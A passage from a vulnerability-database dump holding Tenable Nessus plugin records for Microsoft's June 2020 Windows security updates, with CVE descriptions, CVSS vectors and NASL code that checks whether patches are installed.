(CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\");\n # https://support.microsoft.com/en-us/help/4561669/windows-7-update-kb4561669\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b7da0444\");\n # https://support.microsoft.com/en-us/help/4561643/windows-7-update-kb4561643\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?602a11b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561669 or Cumulative Update KB4561643.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561643',\n '4561669'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561643, 4561669])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:29", "description": "The remote Windows host is missing security update 4561674 or cumulative update 4561612. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561674: Windows Server 2012 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561612.NASL", "href": "https://www.tenable.com/plugins/nessus/137257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137257);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561612\");\n script_xref(name:\"MSKB\", value:\"4561674\");\n script_xref(name:\"MSFT\", value:\"MS20-4561612\");\n script_xref(name:\"MSFT\", value:\"MS20-4561674\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561674: Windows Server 2012 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561674\nor cumulative update 4561612. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561612/windows-server-2012-update-kb4561612\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c1557bf\");\n # https://support.microsoft.com/en-us/help/4561674/windows-server-2012-update-kb4561674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?003ee4f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561674 or Cumulative Update KB4561612.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561612',\n '4561674'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561612, 4561674])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:53", "description": "The remote Windows host is missing security update 4561673 or cumulative update 4561666. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles 